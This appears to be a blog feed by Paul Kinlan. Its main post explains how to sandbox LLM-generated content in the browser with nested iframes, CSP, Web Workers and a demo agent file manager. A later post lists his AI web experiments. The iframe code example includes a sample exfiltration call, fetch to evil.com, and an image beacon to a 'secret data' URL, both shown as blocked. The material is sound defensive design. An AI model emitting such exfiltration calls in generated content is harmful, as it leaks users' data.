<p>If you are in a Blink-based browser, you do have the ability to set the <code>csp</code> attribute and control what the embedded content can do on the network. It&rsquo;s odd that this isn&rsquo;t available on Gecko or WebKit-based browsers, as it seems like a very useful attribute to allow the host to have fine-grained control over what requests are allowed from the embedded frame.</p>
<p>If you want to run untrusted JS, you need to at least wrap the iframe in another iframe and process all the text to ensure that there are no other <code>&lt;iframe&gt;</code> elements in the input, and you have to ensure that they are on different origins (so don&rsquo;t include <code>sandbox='allow-same-origin'</code>).</p>
<h3 id="the-double-iframe-technique">The double iframe technique</h3>
<p>There is a way to manage and control this, but I&rsquo;ve not seen a huge amount of discussion about it online: the double iframe. This is a method used by a number of large-scale embedders (I believe Google Ads and OpenAI use it). The general concept is that you have an inner and an outer frame.</p>
<p>The outer iframe embeds a resource you control (often via srcdoc) and sets a restrictive policy on all network requests, acting as a policy firewall for the inner content:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-html" data-lang="html"><span style="display:flex;"><span><span style="color:#75715e">&lt;!-- Do not use this - You should sanitise srcdoc and likely set it via JS vs rendered from Server --&gt;</span>
</span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">iframe</span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">id</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;jail&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">sandbox</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;allow-scripts&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">srcdoc</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    &lt;!-- OUTER FRAME: Defines the &#39;No Network&#39; Policy --&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    &lt;meta http-equiv=&#39;Content-Security-Policy&#39; content=&amp;quot;default-src &#39;none&#39;; script-src &#39;unsafe-inline&#39;; style-src &#39;unsafe-inline&#39;&amp;quot;&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    &lt;!-- INNER FRAME: Holds the content --&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    &lt;iframe sandbox=&#39;&#39; srcdoc=&#39;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        &lt;h1&gt;LLM Generated Content&lt;/h1&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        &lt;script&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            // Blocked twice: the inner sandbox omits allow-scripts, and default-src none forbids the request
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            fetch(&#39;https://evil.com&#39;);
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        &lt;/script&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        &lt;img src=&#39;https://aifoc.us/someurlswithsecretdata&#39;&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    &#39;&gt;&lt;/iframe&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>&gt;&lt;/<span style="color:#f92672">iframe</span>&gt;
</span></span></code></pre></div><p>The inner iframe will display the content and should have no ability to communicate with the host iframe. There are a number of issues with the above example:</p>
<ol>
<li>The very restrictive inner sandbox is isolated onto another origin and as such we can&rsquo;t get access to the container size, so it&rsquo;s hard to build good-looking UI. There might be a way to expand it to <code>allow-same-origin</code> but you have to deal with the trade-offs.</li>
<li>This is still hard to manage. You have to ensure that the data included in the inner <code>srcdoc</code> is properly escaped so it doesn&rsquo;t break out of the attribute string if you encode it straight from a server.</li>
<li>The double-iframe is also incredibly wasteful. It&rsquo;s essentially loading two full DOMs (which are already heavy) every time we embed untrusted content.</li>
</ol>
<h3 id="improving-the-iframe-sandbox">Improving the iframe sandbox</h3>
<p>The iframe is the only renderer sandbox we have, and I think there are a number of improvements browsers should make:</p>
<ul>
<li>All browsers should ship the <code>csp</code> attribute and let the embedder refine and further restrict access to the network.</li>
<li>I&rsquo;m not confident that CSP alone prevents all network access. The Beacon API might appear to queue a message. While <code>connect-src</code> should strictly block beacons, edge cases in implementation can be tricky. Similarly, what happens with DNS lookups? A quick dump of the network traffic in Chrome via <code>chrome://net-export/</code> seems to show no network access, but I believe this area deserves more rigorous stress-testing.</li>
<li>We need a way to size the outer-iframe (or iframes in general) that doesn&rsquo;t rely on access to <code>iframe.contentDocument.body.scrollHeight</code> and <code>sandbox='allow-same-origin'</code>. This constraint means that we have to completely distrust any JS that might be rendered in the inner-frame, and I think that is a shame because it would be nice to be able to have fully interactive experiences.</li>
<li>If we want to stream data into the iframe, we need <code>sandbox='allow-same-origin'</code> which gives embedded content a way to access resources that are local to the current origin (cookies etc). It would be useful to be able to stream updates to the DOM and keep them on separate origins.</li>
<li>I would like a way to reduce the overhead of iframes. If we are disabling advanced functionality, do they get loaded in the DOM? I really don&rsquo;t know about this, but having the double-iframe is doubly wasteful.</li>
</ul>
<p>There are probably more things that are needed, and I don&rsquo;t know whether it would be easier to have a new dedicated element like <code>&lt;sandbox href&gt;</code> that is more suited to running untrusted content. Chrome did <a href="https://wicg.github.io/fenced-frame/">propose Fenced Frames</a> for the Privacy Sandbox project, which solve some of these issues. They allow data to be passed between frames in a controlled way and can entirely disable network access with <code>disableUntrustedNetwork()</code>. This doesn&rsquo;t work outside of Chrome, so your options are limited.</p>
<h2 id="the-execution-environment">The execution environment</h2>
<p>We&rsquo;ve somewhat locked down the network and we feel somewhat confident that we can constrain the content coming back from the LLM. We think we have a pretty reasonable set of sandboxing options for the file system. What about execution?</p>
<p>LLMs are incredibly powerful when they have access to tools. Many of these tools are now provided as <a href="https://modelcontextprotocol.io/">MCP servers</a>, which are out of scope for this post. The tools I am talking about are developer-provided functions, from which the LLM picks the best one to call.</p>
<p>It turns out we have two runtimes in the browser that allow us to run code: the JS environment that we all know and love, and the <a href="https://webassembly.org/">WebAssembly (WASM)</a> runtime. Both are designed to be able to run code from any untrusted source safely on the user&rsquo;s computer. WASM in particular is incredibly interesting because it enables us to bring decades of software from other systems and run them safely inside the browser. For example, it&rsquo;s possible to create and run a <a href="https://sqlite.org/wasm/doc/trunk/index.md">sqlite database entirely inside the browser</a> by compiling it to WASM. The WASM security model is robust, designed specifically to execute untrusted binaries safely.</p>
<p>Running untrusted code directly in the DOM, or even running code we trust with untrusted input, is incredibly risky, so the execution needs to be further sandboxed as far away as possible from our UI environment. We could maybe think about running them in an iframe as noted above; however, Web Workers let us isolate our code from the UI in both the DOM manipulation sense and the off-the-main-thread sense. Web Workers can also inherit a very strict set of CSP constraints that block network access.</p>
<h2 id="putting-it-into-practice-co-do">Putting it into practice: Co-do</h2>
<p>So how feasible is this to put into practice? Well, I built a demo.</p>
<p>Introducing <a href="http://co-do.xyz">co-do.xyz</a> [<a href="https://github.com/PaulKinlan/Co-do/">Source</a>] - a <strong><em>demo</em></strong> and an <strong><em>experiment</em></strong> (with no warranties) of everything that we&rsquo;ve talked about above.</p>
<p>Co-do is an AI-powered file manager that runs entirely in the browser. You grant it access to a folder on your machine, configure your AI provider (Anthropic, OpenAI, or Google), and ask it to help with file operations: listing files, creating documents, searching content, comparing files. It also has access to a number of pre-compiled WASM binaries for operations that you might want to perform on files (text files only for now; I&rsquo;m hoping to bundle <code>ffmpeg</code> later).</p>
<p><figure><img src="/images/co-do-1.png"
    alt="Co-do"><figcaption>
      <p>Co-do - asking a complex request on file data</p>
    </figcaption>
</figure>

<figure><img src="/images/co-do-start.png"
    alt="Co-do"><figcaption>
      <p>Co-do - planning</p>
    </figcaption>
</figure>

<figure><img src="/images/co-do-permission.png"
    alt="Co-do"><figcaption>
      <p>Co-do - Using a WASM tool (sha256) and asking for permission to hash a file</p>
    </figcaption>
</figure>

<figure><img src="/images/co-do-create.png"
    alt="Co-do"><figcaption>
      <p>Co-do - Asking for permission to create a file on the filesystem</p>
    </figcaption>
</figure>

<figure><img src="/images/co-do-final.png"
    alt="Co-do"><figcaption>
      <p>Co-do - All done - summary, new file and sha256</p>
    </figcaption>
</figure>
</p>
<p>Here is the <a href="/sandbox-summary.md">summary file</a> that was created in the screenshots.</p>
<p>It implements the layered sandboxing approach we discussed:</p>
<ol>
<li><strong>File system isolation via the File System Access API</strong> - You select a folder, and Co-do can only operate within that boundary. No reaching up to parent directories, no accessing siblings. It&rsquo;s the browser&rsquo;s chroot equivalent.</li>
<li><strong>Network lockdown via CSP</strong> - The strictest policy I could manage is to block everything and then only allow: <code>connect-src 'self' https://api.anthropic.com https://api.openai.com https://generativelanguage.googleapis.com</code>. Only the AI providers can receive your data. Image tags exfiltrating content to unknown servers should not be easy, but there&rsquo;s a world where any of these three API providers has an endpoint that could be accessible by a simple <code>GET</code>.</li>
<li><strong>LLM input guarding</strong> - The current demo will send the contents of the file to the LLM. Firstly, this might not be needed for tool calling, and secondly, you have to be confident that tools you configure on your call to the LLM won&rsquo;t leak data (for example, many APIs have a Web Search tool - is it secure? I&rsquo;m sure the providers do their best, but you need to make sure it&rsquo;s not a new vector for exfiltration).</li>
<li><strong>LLM output sandboxing</strong> - AI responses render in sandboxed iframes with <code>allow-same-origin</code> but critically not <code>allow-scripts</code>. The LLM can&rsquo;t inject executable JavaScript into the page. We can measure the content height for proper display, but any <code>&lt;script&gt;</code> tags are dead on arrival.</li>
<li><strong>Execution isolation for custom tools</strong> - Co-do supports WebAssembly custom tools that run in isolated Web Workers. Each execution gets a fresh Worker that can be truly terminated if it misbehaves (timeouts, runaway loops). The Workers inherit the CSP, so even WASM modules shouldn&rsquo;t be able to make unauthorised network requests.</li>
</ol>
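<p>The permission prompts in the screenshots follow three settings per operation: always allow, ask each time, never allow. A minimal sketch of that gate, assuming hypothetical names throughout (<code>Permission</code>, <code>mayRun</code>, and the example settings are mine, not Co-do&rsquo;s). A real prompt would be asynchronous; it is kept synchronous here for brevity.</p>

```typescript
type Permission = "always" | "ask" | "never";

// Hypothetical gate: returns true if a tool call may proceed.
// askUser stands in for whatever prompt the UI shows and is only
// invoked when the setting is "ask".
function mayRun(permission: Permission, askUser: () => boolean): boolean {
  if (permission === "always") {
    return true;
  }
  if (permission === "never") {
    return false;
  }
  return askUser();
}

// Example settings, invented for illustration.
const settings: { listFiles: Permission; writeFile: Permission; deleteFile: Permission } = {
  listFiles: "always",
  writeFile: "ask",
  deleteFile: "never",
};

console.log(mayRun(settings.deleteFile, () => true)); // false
```

<p>Keeping the decision in one function means destructive tools can default to <code>"ask"</code> or <code>"never"</code> while read-only tools stay frictionless.</p>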
<h2 id="known-gaps">Known gaps</h2>
<p>There are some gaps that everyone should be aware of:</p>
<ul>
<li><strong>You&rsquo;re still trusting the LLM provider.</strong> Your file contents get sent to Anthropic, OpenAI, or Google for processing. CSP ensures data only goes there, but &ldquo;there&rdquo; is still a third party. A fully local model would solve this, but we&rsquo;re not quite there yet for capable models in the browser.</li>
<li><strong>Malicious file creation is still possible.</strong> The LLM could create a .docx with macros, a .bat file, or a malicious script that&rsquo;s harmless in the browser but dangerous when opened by another application. The sandbox protects the browser session, not your whole system.</li>
<li><strong>The allow-same-origin trade-off.</strong> The markdown iframe needs this to calculate content height for proper display. This means I can&rsquo;t run scripts and have same-origin access without the iframe being able to escape its sandbox. I chose no scripts, but it&rsquo;s a compromise - I can&rsquo;t offer interactive rendered content.</li>
<li><strong>CSP might not block everything.</strong> I&rsquo;m reasonably confident about fetch and XHR, but what about the Beacon API queuing requests? DNS prefetch for resources? A <code>chrome://net-export/</code> dump looked clean, but I don&rsquo;t have complete certainty. More investigation needed.</li>
<li><strong>No undo.</strong> If you grant write permission and the LLM deletes a file, it&rsquo;s gone. Co-do has granular permissions (always allow, ask each time, never allow) but no backup system. The browser&rsquo;s sandbox keeps the LLM in its lane, but within that lane, destructive operations are destructive.</li>
<li><strong>Permission fatigue is real.</strong> Asking users to approve every operation is secure but annoying. Letting users blanket-allow operations is convenient but risky. I&rsquo;ve tried to find a middle ground, but the fundamental tension remains.</li>
<li><strong>Cross-browser limitations.</strong> The <code>csp</code> attribute on iframes only works in Blink-based browsers. The double-iframe technique works everywhere but it&rsquo;s wasteful and awkward. Safari&rsquo;s File System Access API support is limited (specifically, it lacks <code>showDirectoryPicker</code>, making the local folder editing workflow impossible currently).</li>
</ul>
<p><strong>This is really a Chrome demo.</strong></p>
<p>Is it perfect? No. But I think it demonstrates that the browser&rsquo;s 30-year-old security model, built for running hostile code from strangers the moment you click a link, might be better suited for agentic AI than we give it credit for. However, I do think there should be a lot more investment from browser vendors in improving the primitives for securely running generated content (be it an ad, an LLM, or any embed).</p>
]]></content:encoded></item><item><title>projects</title><link>https://aifoc.us/projects/</link><pubDate>Fri, 02 Jan 2026 19:20:54 +0000</pubDate><author>paul@aifoc.us (Paul Kinlan)</author><guid>https://aifoc.us/projects/</guid><description>&lt;p>It’s been nearly 9 months since I started this blog and I feel that while I kept up a good pace of articles and I’ve dived deeper in to my thoughts on the intersection of web and AI (specifically LLMs), however a lot of what I’ve done is hidden away because they are the things that I&amp;rsquo;ve been building that help me test my ideas and hypothesis'.&lt;/p>
&lt;p>To set some context, I&amp;rsquo;m the manager and lead of the Chrome Developer Relations team. My day job is to help my team be successful (they are successful when they help developers build amazing websites and help the web to thrive). Up until 2024 I&amp;rsquo;d been personally very pessimistic about the health and future of the Web. The platform is competing against mobile platforms (specifically Apps) and the platforms defined by those Apps (Facebook, Instagram, TikTok) and not really succeeding. These new platforms made it even easier to share ideas and content, and the general thought was that all use of computing by the billions of people on the planet will move to these new platforms and you could see and feel this slow decline of the web.&lt;/p></description><content:encoded><![CDATA[<p>It’s been nearly 9 months since I started this blog. I feel that while I&rsquo;ve kept up a good pace of articles and dived deeper into my thoughts on the intersection of the web and AI (specifically LLMs), a lot of what I’ve done is hidden away, because it consists of the things I&rsquo;ve been building to test my ideas and hypotheses.</p>
<p>To set some context, I&rsquo;m the manager and lead of the Chrome Developer Relations team. My day job is to help my team be successful (they are successful when they help developers build amazing websites and help the web to thrive). Up until 2024 I&rsquo;d been personally very pessimistic about the health and future of the Web. The platform is competing against mobile platforms (specifically Apps) and the platforms defined by those Apps (Facebook, Instagram, TikTok) and not really succeeding. These new platforms made it even easier to share ideas and content, and the general thought was that all use of computing by the billions of people on the planet will move to these new platforms and you could see and feel this slow decline of the web.</p>
<p>While LLMs have enabled me to be incredibly productive in my day job, they have also revitalised my passion for the web because 1) I think it&rsquo;s the most versatile medium that we have ever seen (and will ever see), and the ability of LLMs to parse and manipulate content gives us the ability to build entirely new experiences instantly for anyone with a computer and an internet connection, and 2) they rekindled my love of experimenting and pushing the boundaries of what is possible on the medium that is called &ldquo;The Web&rdquo;.</p>
<p>I certainly don&rsquo;t dismiss the challenges that LLMs might also present for the medium, but I&rsquo;m also happy to work out how to tackle these while also building and pushing the capabilities of browsers.</p>
<p>This post details just some of the things that I built that I think are interesting enough to share (and that I can talk about).</p>
<p>First up, the experiments that I built to try and push on the intersection of the Web and LLMs by deeply integrating both technologies:</p>
<ul>
<li>
<p><a href="https://github.com/PaulKinlan/ai-wc">ai-wc</a> - AI Web Components. In my <a href="https://aifoc.us/elements/">elements</a> post I explored how we might add LLM technology to enhance existing elements. I&rsquo;ve got a bit of a love-hate relationship with Web Components, but the ability for them to now participate in a <code>&lt;form&gt;</code> submission is a critical enhancement and I really wish there was more exploration of web components in this context.</p>
</li>
<li>
<p><a href="https://blogcrafteditor.paulkinlan-ea.deno.net/">Blog Craft Editor</a> - I explored how to add writing assistance to an existing editor that I built just using LLMs. The updated editor can now upload all of your content from a directory on your machine and use it to cross-reference existing posts, finding links that you forgot and, more importantly for me, helping to find gaps or connections across things that you&rsquo;ve said before. Using your existing writing as context, the tools can act as a useful critic of your ideas if you prompt them correctly.</p>
</li>
<li>
<p><a href="https://www.val.town/x/paulkinlan/deep-research-email">Deep Research via Email</a> - Send an email to: <code>deep-research@valtown.email</code>. <strong>Subject</strong>: Your research topic (used for threading and replies). <strong>Body</strong>: Detailed research question or context. <strong>Wait</strong>: The system will process your request via Gemini DeepResearch Agent and send the research report back to your email.</p>
</li>
<li>
<p><a href="https://github.com/PaulKinlan/fauxmium">Fauxmium</a> - I&rsquo;m particularly proud of this one. A fully fake internet. Inspired by the original websim project - you enter a URL and you get a website that the LLM generates from its own biases about what that URL might represent. This version is even more advanced: it starts up a real browser (Chrome for Testing) and the LLM intercepts every request and generates a response. I just run <code>npx fauxmium</code> when I need some entertainment and I browse a fake web for a couple of hours. Some neat things about this: it generates images for the page and it can also create videos. This means that you can go to a fake YouTube and watch an infinite set of 8-second clips (the neat thing is that the video uses the generated poster art as the source). The final neat thing is that it installs a Chrome Extension to help you track the cost of your browsing&hellip; It&rsquo;s fun that it&rsquo;s about as fast as the &rsquo;90s internet and costs a similar amount to what my parents paid for the minutes I used on the telephone.</p>
<ul>
<li><a href="https://github.com/PaulKinlan/interceptium">Interceptium</a> - Following on from Fauxmium, I wanted to experiment with what an LLM could do if it sat at different parts of the network request stack, i.e., if it could generate POST data or completely change the response. This was a pretty interesting experiment because it formed my thoughts on a completely personalised browsing experience. If I like sites to be summarized, why can&rsquo;t I, as the user of the user-agent, just say that&rsquo;s how <em>I</em> want to browse the web? There is a constant tension between site owners who want their exact intent rendered and a user&rsquo;s needs and preferences. I don&rsquo;t know where I sit on this, but I do think with LLMs the web is changing under our feet and everything will be personalised soon.</li>
</ul>
</li>
<li>
<p><a href="https://flickity.val.run/">Flickity.val.run</a> - this is a fun one. As I thought about personalisation, I wondered if we could spruce up the new tab page in Chrome on Mobile and, instead of just showing a list of articles, show a dynamic video like you get on TikTok. The quality is not yet there (the coherence of the video is not quite right when it renders what the page might look like), but it&rsquo;s very fun to watch (especially when I ask it to generate dancing TikTok videos). The process for doing this is simple, though: I get a list of posts from Hacker News, extract the content and summarize it as a script, take a screenshot that can be used in the video, and then use Veo3 to render a video. It led me to <a href="https://aifoc.us/hyper-content-negotiation/">hyper-content-negotiation</a>.</p>
</li>
<li>
<p><a href="https://github.com/PaulKinlan/hyperlink">Hyperlink Experiment</a>: There is a lot in here&hellip; I struggle with the hubris the industry has around the link. I set out to experiment with the concept of linking on the web, and I really want to encourage people to push the boundaries of what a link is and, where possible, to use technologies like LLMs and image recognition models to change how the web fundamentally works.</p>
<ul>
<li><a href="https://github.com/PaulKinlan/hyperlink/tree/main/packages/merge">Merge</a> - <a href="https://chromewebstore.google.com/detail/merge-link/ffpcdfloldhbeielaoiblgalmpkalnjo">Extension</a> - One of the things I love about the web is that you don&rsquo;t really know what is on the other side of a link. One of the things I dislike is that you don&rsquo;t know what is on the other side of a link. I also wonder what the intent of a link is -</li>
<li><a href="https://github.com/PaulKinlan/hyperlink/tree/main/packages/memex-join">Trails</a> - <a href="https://chromewebstore.google.com/detail/trails/cmhofadlaokelmccnocbnojdbdnfjhga">Extension</a> - This uses no LLM technology, but I built it with an LLM. Vannevar Bush&rsquo;s &ldquo;User links&rdquo;, lets you create your own links on pages and have them be permanent.</li>
<li><a href="https://github.com/PaulKinlan/hyperlink/tree/main/packages/summary">Summary</a> - Hover over a link and get a summary of what is on the linked page before you click it.</li>
<li><a href="https://github.com/PaulKinlan/hyperlink/tree/main/packages/stretchtext">Stretch Text</a> - Taking Ted Nelson&rsquo;s idea and trying to make it usable. Select some text and zoom in (expand) or zoom out (summarize). In Ted Nelson&rsquo;s original idea it was up to the author to offer this, and knowing how people publish on the web, people just aren&rsquo;t going to do this. LLMs make it possible to add extra context or summarize it. I didn&rsquo;t really test this too much in the end because I wanted to get Merge and Trails working.</li>
<li>I made a lot of other experiments, such as linking into images with descriptions, and making it easy to do <a href="https://github.com/PaulKinlan/hyperlink/tree/main/packages/image-links/src">image-maps again by using English (using the Segment Anything model)</a> instead of points. <a href="https://github.com/PaulKinlan/hyperlink/tree/main/packages/audio-link">Link to audio content vs timestamps with a whisper-like model.</a> <a href="https://github.com/PaulKinlan/hyperlink/tree/main/packages/ui-links">Pull in the UI of a linked element</a> into the current page, taking the Merge experiment one step further.</li>
</ul>
</li>
<li>
<p><a href="https://LLMdeck.xyz">LLMdeck.xyz</a> - I really just wanted a way to see the results from a couple of models at the same time. It can use Gemini, Claude, OpenAI and Chrome&rsquo;s built-in model. Hosted on <a href="https://val.town">val.town</a> and <a href="https://www.val.town/x/paulkinlan/eval">built</a> with Townie (1 manual change to a CSS class)</p>
</li>
<li>
<p><a href="https://Makemy.blog">Makemy.blog</a> - I <a href="https://github.com/PaulKinlan/gen-site">built a full on site building platform on Deno</a>, mostly coded with an LLM. You describe the site you want and it will be generated. It does it on request vs a build step. I need to update the models it uses (for example, it generates images before Nano-banana even existed). This was really just an experiment to see if I can make it as easy as possible for non-coders to get a site online without having to engage an agency or fall back to facebook (which happens a lot here in Ruthin).</p>
</li>
<li>
<p>&lt;<a href="https://github.com/PaulKinlan/generate-html-element">generate-html</a>&gt; <a href="https://generate-html-element.paulkinlan-ea.deno.net/">Custom Element</a> - I spent some time reverse engineering how OpenAI&rsquo;s Skybridge works. I thought it was neat how they use a double iframe and the <code>sandbox</code> attribute to make it more safe to embed and interact with untrusted 3p content. So i <a href="https://generate-html-element.paulkinlan-ea.deno.net/">decided to push on</a> this and see how feasible it would be to allow LLMs to go nuts inside a custom element. Fun experiment (but it requires exposing your API key in the client so has very limited production value right now - hey, <a href="https://aifoc.us/dangerous/">API keys still need to be solved</a>)</p>
</li>
<li>
<p><a href="https://github.com/PaulKinlan/reactive-prompt">reactive-prompt</a> - technically 2024, but I&rsquo;ve updated it a fair bit this year. I think an un-explored area of LLMs is reactivity, that is using a set of prompts where parts of the inputs can change and the prompt will automatically get re-run. I think this is important if we are going to build dynamic UIs that respond to user input and act in a similar way to reactive-UIs. Also as we consider workflows vs agent processes, if I know the steps we need to take and every step is processed by an LLM (or even normal code) then being able to control this and package it up will be important.</p>
<ul>
<li><a href="https://github.com/PaulKinlan/reactive-agent">reactive-agent</a> - Built on top of <code>reactive-prompt</code> I tried to explore building agent workflows that run in response to changes in input. This model is pretty convoluted and you quickly get caught up in <code>effect()</code> overload. Fun though.</li>
<li><a href="https://github.com/PaulKinlan/f">f</a> - Inspired by my friend Dion and his post on English as <em>the</em> programming language, I wanted to test if we could build functions in the browser &ldquo;f<code>Create a UI that renders the Space Weather forecast using this schema`({someData:&quot;&quot;})</code>&rdquo;. I&rsquo;d never use this in product unless the environment was completely locked down. I do think it is a very interesting experiment that should get a lot more research.</li>
</ul>
</li>
<li>
<p><a href="https://github.com/PaulKinlan/ssgen/blob/main/content/carousel.md">ssgen</a> - I really went all in thinking about how CMS&rsquo;s might work in the future. ssgen is a simple CMS that parses Markdown of the content and then applies intent and design (via images or text). It also has high-level concepts like custom elements that are just prompts (think <code>&lt;carousel&gt;a list of things&lt;/carousel&gt;</code> and it <a href="https://github.com/PaulKinlan/ssgen/blob/main/content/carousel.md">just works out what to render</a>). In this demo I also pushed on the idea of every web page being personalised to the user: It knows what browser you are using so it can output very specific HTML, CSS and JS that target that version of the browser; It might know your preference via an <code>accept-preference</code> and it renders the page to <em>your</em> liking.</p>
</li>
<li>
<p><a href="https://github.com/PaulKinlan/token-counter">Token counter</a> - I wanted a CLI way to quickly check how many tokens are in some text. <code>tcnt</code> is your <a href="https://www.npmjs.com/package/tcnt">answer</a>.</p>
</li>
<li>
<p><a href="https://github.com/PaulKinlan/omnibox-mcp">Omnibox-mcp</a> - I built this to showcase to the Chrome team what having MCP as a first-class citizen might look like. It&rsquo;s a Chrome extension that registers an omnibox keyword <code>@mcp</code> and when invoked will act like an agent. It was built pretty much exclusively with an LLM.</p>
</li>
</ul>
<p>I&rsquo;ve built a lot of software this year that, while it doesn&rsquo;t push on the intersection of Web and LLMs, is me using LLMs exclusively to accelerate and amplify my ability to ship products. Here are just a few of them:</p>
<ul>
<li><a href="https://github.com/PaulKinlan/leviroutes">LeviRoutes</a> - Untouched for over a decade, I refactored using LLMs and even published it to <a href="https://www.npmjs.com/package/leviroutes">npm</a>. I wouldn&rsquo;t have done this at all without an LLM. I use co-pilot a lot and I thought it was pretty neat that you can <a href="https://github.com/PaulKinlan/leviroutes/issues/22">get it to write reports for you too</a>.</li>
<li><a href="https://paulkinlan.github.io/HackerNewsDeck/">Hacker News Deck</a> - I really like the TweetDeck UX pattern, so I built one for <a href="https://github.com/PaulKinlan/HackerNewsDeck">Hacker News</a>. This one was almost one-shotted.</li>
<li><a href="https://github.com/PaulKinlan/ContentCrafter">Content Crafter</a> - a tool to help me and the team make social posts. I use it a lot less than I thought I would, but hey, I built it in about an hour.</li>
<li><a href="https://github.com/PaulKinlan/bluesky-poster">BlueSky poster</a> - I built this for a demo for Google IO to demonstrate Chrome&rsquo;s on-device APIs&hellip; It&rsquo;s fine, I guess.</li>
<li><a href="https://github.com/PaulKinlan/full-rss">Full RSS</a> - It annoys me that sites only do partial RSS. <a href="https://full-rss.deno.dev/">This</a> site fixes that.</li>
<li><a href="https://github.com/PaulKinlan/superduperfeeder">Superfeedr</a> clone and <a href="https://github.com/PaulKinlan/superduperfeeder-hub">hub</a> - I really needed a way to get updates from RSS feeds without polling every site. WebSub nee PubSubhubbub was a great solution and Superfeedr a great product (now owned by Medium) but was too pricey. I used an LLM to <a href="https://superduperfeeder.deno.dev/ui">build me the entire platform I needed</a>. I made a mistake in the first version I built where I merged the client and the hub into one project. It took a bit longer to unstick all this, but Claude helped me a lot.</li>
<li><a href="https://github.com/PaulKinlan/ntp">NTP</a> - I just needed a simple way to customise what happens on CMD/CTRL-T.</li>
<li><a href="https://TLDR.express">TLDR.express</a> - a site that takes a list of RSS feeds and summarises new posts to them each day. The <a href="https://github.com/PaulKinlan/RSSFeedSummary">code is pretty simple</a>, it just runs and I find it incredibly useful.</li>
<li><a href="https://posthero.us">posthero.us</a> - I <a href="https://www.val.town/x/paulkinlan/postherous">built</a> an email based blogging platform that is integrated in to the fediverse. All coded via an LLM including the ActivityPub integration (It was crazy, Val.town&rsquo;s Townie even built KeyGen tools for me to ensure that I had the correct public and private keys). It was crazy how far I got building this on a phone.</li>
<li><a href="https://sendvia.me">sendvia.me</a> - It blows my mind that I can&rsquo;t email docs and newsletters to my remarkable, I have to download them and sync them in drive. Ridiculous. Anyway, I <a href="https://github.com/PaulKinlan/send-to-remarkable">built a tool that does it</a>. It needs updating to the latest API from remarkable - big shout out to <a href="https://github.com/erikbrinkman/rmapi-js">Erik Brinkman and rmapi-js</a></li>
<li><a href="https://github.com/PaulKinlan/robots-txt-scanner">Robots.txt scanner</a> - I needed a simple tool that helps me get some stats on who blocks what in the context of AI companies. It&rsquo;s not perfect, but it got me the answer I needed.</li>
<li><a href="https://github.com/PaulKinlan/site-category">Site categoriser</a> - Similar to robots.txt, I wanted to quickly categorize the top 10k sites. Again, far from perfect but useful enough.</li>
<li><a href="https://www.val.town/x/paulkinlan/stop-dont-do-this">Stop don&rsquo;t do this</a> - Shell script generator. At some point I want to explore a shell entirely driven by LLMs.</li>
<li><a href="https://github.com/PaulKinlan/warpscan">Warpscan.app</a> - I <a href="https://warpscan.app/">built</a> this to make my daughter laugh. I saw a bunch of funny videos for a similar native app and just wanted something that worked well in the browser. This was built entirely with an LLM but also highlighted issues when asking it to use APIs that were not in the model (in this case the new FileSystem API). The lag between new API coming out and being in the model is alarming and presents real challenges for any new tool, and RAG just doesn&rsquo;t cut the mustard.</li>
</ul>
<p>I will aim to also keep this post updated over the coming months and years.</p>
]]></content:encoded></item><item><title>hyper content negotiation</title><link>https://aifoc.us/hyper-content-negotiation/</link><pubDate>Thu, 27 Nov 2025 11:39:28 +0000</pubDate><author>paul@aifoc.us (Paul Kinlan)</author><guid>https://aifoc.us/hyper-content-negotiation/</guid><description>&lt;p>I fondly remember sitting with my friend Chris learning how to make HTTP requests so that we could more quickly check if our web pages were rendering as we expected without the need to load the browser.&lt;/p>
&lt;p>We would use:&lt;/p>
&lt;pre tabindex="0">&lt;code>c:\telnet.exe pcbware.com 80
&lt;/code>&lt;/pre>&lt;p>Then blindly type:&lt;/p>
&lt;pre tabindex="0">&lt;code>GET /index.shtml HTTP/1.0
&lt;/code>&lt;/pre>&lt;p>The keys I typed weren&amp;rsquo;t echoed back to me, but if we got it right it would return:&lt;/p>
&lt;pre tabindex="0">&lt;code>200 OK
Content-Type: text/html
&amp;lt;! .......
&lt;/code>&lt;/pre>&lt;p>Huh. What&amp;rsquo;s Content-Type?&lt;/p></description><content:encoded><![CDATA[<p>I fondly remember sitting with my friend Chris learning how to make HTTP requests so that we could more quickly check if our web pages were rendering as we expected without the need to load the browser.</p>
<p>We would use:</p>
<pre tabindex="0"><code>c:\telnet.exe pcbware.com 80
</code></pre><p>Then blindly type:</p>
<pre tabindex="0"><code>GET /index.shtml HTTP/1.0
</code></pre><p>The keys I typed weren&rsquo;t echoed back to me, but if we got it right it would return:</p>
<pre tabindex="0"><code>200 OK
Content-Type: text/html

&lt;! .......
</code></pre><p>Huh. What&rsquo;s Content-Type?</p>
<p>Content-Type: text/html has literally been in my life for the last 25-30 years, and yet I hardly ever think about what it might offer us and how it might be one of the most critical things for the future of the web (Btw - <a href="https://http.dev/">http.dev</a> is such a good resource for all things HTTP headers).</p>
<p>When I started web development I had no concept of content-negotiation and its importance - for the uninitiated, on the request to the server you can tell the server what types of content you can <a href="https://http.dev/accept">accept</a> and the server has the option of serving any of those formats back.</p>
<pre tabindex="0"><code>GET /index.html HTTP/1.1
Accept: text/html, text/plain;q=0.9, text/*;q=0.8, */*;q=0.7
</code></pre><p>:mind-blown-emoji-in-1998:</p>
